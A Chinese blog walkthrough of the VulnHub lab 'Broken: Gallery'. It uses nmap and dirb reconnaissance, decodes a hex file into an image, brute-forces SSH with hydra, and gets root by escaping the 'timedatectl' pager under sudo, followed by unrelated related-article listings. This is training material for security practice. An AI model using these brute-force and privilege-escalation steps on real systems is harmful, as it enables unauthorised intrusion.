vulnhub系列:broken-gallery

最新推荐文章于 2024-09-14 13:45:00 发布
最新推荐文章于 2024-09-14 13:45:00 发布
阅读量270 收藏 5
点赞数 6
分类专栏: vulnhub系列 文章标签: web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jq_j37/article/details/141093560
版权

vulnhub系列:broken-gallery

靶机下载

一、信息收集

nmap扫描存活,根据mac地址寻找IP

nmap 192.168.23.0/24

image-20240810130542732

nmap扫描端口:开放端口:22、80

nmap 192.168.23.186 -p- -A -sV -Pn

image-20240810130653275

dirb扫描目录,没什么发现

dirb http://192.168.23.186/

image-20240810130724423

访问80端口,可以看到有一些文件

image-20240810130904829

readme.md 中是十六进制的值

image-20240810131123445

将内容写入readme.md中,使用 xxd 转换

xxd -r -ps readme.md > readme.bin

查看文件,发现文件头为 JFIF ,是一张图片

image-20240810131944678

将后缀修改为 jpg ,查看图片

image-20240810132019888

一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh

Bob
BROKEN
avrahamcohen.ac
broken

image-20240810132410300

二、getshell

使用 hydra 进行爆破

hydra -L users.txt -P pass.txt ssh://192.168.23.186

得到账号密码

broken:broken

image-20240810132803799

ssh连接,连接成功

ssh broken@192.168.23.186

image-20240810132933256

三、提权

查看当前权限

sudo -l

image-20240810133009788

看到 timedatectl 可以执行root权限,执行命令,提权成功

sudo timedatectl list-timezones

!/bin/bash

image-20240810133216614

三天三夜睡不着
关注
专栏目录
(重装mysql)在处理时有错误发生: mysql-server-5.7 mysql-serverE: Sub-process /usr/bin/dpkg returned an error c
爆头战斧
12-09 2967
delta@delta-virtual-machine:~$ sudo apt-get install mysql-server [sudo] delta 的密码: 正在读取软件包列表... 完成 正在分析软件包的依赖关系树 正在读取状态信息... 完成 将会同时安装下列软件: libevent-core-2.1-6 libhtml-template-perl mysql-server-5.7 mysql-server-core-5.7 建议安装: libipc-sharedcache-perl mai..
Ubuntu安装nvtop报错nvtop : Depends: libnvidia-compute-418 but it is not going to be installed
qq_41889864的博客
12-11 1367
给新服务器安装完驱动后安装nvtop报错。
VulnhubBROKEN: GALLERY
分享
03-31 381
全篇只有一个进制转换这个难点!
vulnhub靶机 broken-gallery(渗透测试详解)
2301_78721909的博客
08-11 147
vulnhub靶机 broken-gallery(渗透测试详解)
vulnhubBroken: Gallery靶机
wbplife的博客
08-12 240
尝试22端口的ssh进行爆破。尝试timedatectl。
漏洞复现 -- Broken: Gallery
2301_80854251的博客
06-29 179
漏洞复现 -- Broken: Gallery
安装postgresql报错:Requires: llvm-toolset-7-clang >= 4.0.1
sunbocong的博客
06-02 5424
安装postgresql报错:Requires: llvm-toolset-7-clang >= 4.0.1 问题重现 安装postgresql12-devel-12.6-1PGDG.rhel7.x86_64时报错: Error: Package: postgresql12-devel-12.6-1PGDG.rhel7.x86_64 (/postgresql12-devel-12.6-1PGDG.rhel7.x86_64) Requires: llvm-toolset-7-cla
网络安全(黑客技术)2024年三个月自学手册
2401_85026116的博客
09-14 2221
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。走安全行业的工程方向的,技术上面其实有很大的重叠性,抛开甲乙方、岗位名称、岗位职责等因素来看,作为学技术的,也根据以往我们给学员推荐就业和入职情况来看,只要好好掌握以下几种技术(网络协议与安全设备、Linux操作系统、Web服务部署/开发、主流渗透测试/安全工具、一门及以上的编程语言)的2到3个,都可以较好的胜任工作需求。
网络安全】漏洞挖掘
anquan2233的博客
08-29 1933
在springframeworl/expression/spel/stand/InternalSpelExpressionParser/doParseExpression()方法、会在tokenizer.process() 对token进行 源码与字节码的判断操作、继续向下。会进入到springframework/cloud/function/context/config/RoutingFunction/functionFromExpression()方法。Payload 的构造可以参考官方测试用例。
网络安全 L1 Introduction to Security
weixin_74400487的博客
09-12 663
Then he/she may be able to decrypt passwords offline using brute force (thereby bypassing methods to prevent on-line password cracking).暴力破解是一种尝试所有可能的密码组合,直到找到正确密码的方法。由于这种破解尝试是在攻击者的系统上进行的,而不是直接针对目标系统,因此它可以绕过目标系统上可能存在的防止在线密码破解的措施,如账户锁定策略或登录尝试限制。
如何用3个月零基础入门网络安全?_网络安全零基础怎么学习
最新发布
2401_84466224的博客
09-14 813
我们知道计算机最早是在西方发明出来的,很多名词或者代码都是英文的,甚至现有的一些教程最初也是英文原版翻译过来的,而且一个漏洞被发现到翻译成文一般需要一个星期的时间,在这个时间差上漏洞可能都修补了。”答案是否定的,黑客用的电脑,不需要什么高的配置,只要稳定就行.因为黑客所使用的一些程序,低端CPU也可以很好的运行,而且不占什么内存.还有一个,黑客是在DOS命令下对进行的,所以电脑能使用到最佳状态!观看学习近十年所有0day挖掘的帖,然后搭建环境,去复现漏洞,去思考学习笔者的挖洞思维,培养自己的渗透思维。
网络安全 DVWA通关指南 DVWA SQL Injection (Blind SQL盲注)
YueXuan_521的博客
09-14 818
这篇文章是关于网络安全DVWA(Damn Vulnerable Web Application)的SQL注入挑战指南,主要介绍了Low、Medium、High和Impossible四个安全级别的SQL盲注攻击方法。Low级别通过直接构造SQL语句获取数据库信息;Medium级别使用ASCII码值绕过单引号转义;High级别使用布尔盲注和Cookie传参,并有限制查询结果;Impossible级别通过参数化查询和CSRF令牌防御SQL注入。文章详细展示了攻击步骤和防御措施,帮助读者理解
国家网络安全宣传周 | 2024年网络安全领域重大政策法规一览
WAJXY2021的博客
09-12 941
整理了2024年国内发布的网络安全领域相关政策法规,希望能为广大从业者与关注者提供相关参考,共同促进网络安全生态的健康发展。
入门网络安全工程师要学习哪些内容
白帽子佳奇的博客
09-09 1524
大家都知道网络安全行业很火,这个行业因为国家政策趋势正在大力发展,大有可为!但很多人对还是不了解,不知道需要学什么?知了堂小编总结出以下要点。是一个概称,学习的东西很多,具体学什么看自己以后的职业定位。如果你以后想成为安全产品工程师,学的内容侧重点就和不一样,如果你想成为安全开发工程师,学的侧重点就和安全不一样。学的东西很泛,但选定方向就简单了。大致的学习流程总结就是:网络基础、操作系统、间件、数据库。其电脑基础:像系统Windows基础和Linux基础、HTML基础、代码JS基础等。
网络安全(黑客)自学
白帽子凯哥聊黑客
09-08 1672
网络安全可以基于攻击和防御视角来分类,我们经常听到的 “红队”、“渗透测试” 等就是研究攻击技术,而“蓝队”、“安全运营”、“安全运维”则研究防御技术。无论网络、Web、移动、桌面、云等哪个领域,都有攻与防两面性,例如 Web安全技术,既有 Web 渗透,也有 Web 防御技术(WAF)。作为一个合格的网络安全工程师,应该做到攻守兼备,毕竟知己知彼,才能百战百胜。
sudo apt --fix-broken install -o Dpkg::Options::=--force-overwrite
11-10
这个命令的作用是修复Ubuntu系统的损坏的软件包依赖关系。其,`--fix-brok`选项表示修复损坏的软件包依赖关系,`- DpkgOptions=\"--for-overwri\"`选项表示强制覆盖已经安装的软件包。这个命令可以在终端输入...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值